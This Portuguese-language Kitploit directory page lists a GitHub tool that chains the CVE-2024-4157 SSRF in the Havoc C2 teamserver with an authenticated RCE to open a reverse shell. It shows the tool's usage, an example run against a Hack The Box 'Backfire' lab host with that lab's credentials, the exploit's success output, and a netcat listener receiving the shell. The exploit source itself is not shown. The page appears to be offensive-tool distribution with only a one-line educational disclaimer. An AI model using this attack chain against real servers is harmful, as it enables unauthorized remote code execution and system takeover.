Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Encadeando SSRF do Havoc C2 com RCE para obter reverse shell no servidor Havoc C2. | Kitploit
Ferramentas/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Encadeando SSRF do Havoc C2 com RCE para obter reverse shell no servidor Havoc C2.

Ver Repositório
36há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4157: Obtendo Reverse Shell no Havoc C2 - Encadeando SSRF com RCE

Obtenha reverse-shell com IP e Porta local, encadeando CVE-2024-4157 POC com havoc_auth_rce

Uso

  • Informações básicas
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: IP alvo onde o servidor C2 está rodando
## -i: endereço IP interno com o qual queremos que o servidor C2 interaja (SSRF)
## -p: porta interna
## -U: nome de usuário para o servidor C2
## -P: senha para o servidor C2
## -l: endereço local para o reverse shell (RCE)
## -lp: porta local para o reverse shell
  • Exemplo
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • Reverse shell no nosso ouvinte nc
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

Créditos

  • Créditos a @chebuya pelo SSRF, blog detalhado sobre a vulnerabilidade
  • Créditos a @Laurence Tennant pelo RCE, informações detalhadas no blog
  • Créditos a 0xdf pelo excelente writeup no HTB Backfire

Aviso Legal

  • Esta ferramenta é apenas para fins educacionais e de pesquisa
Baixar ferramenta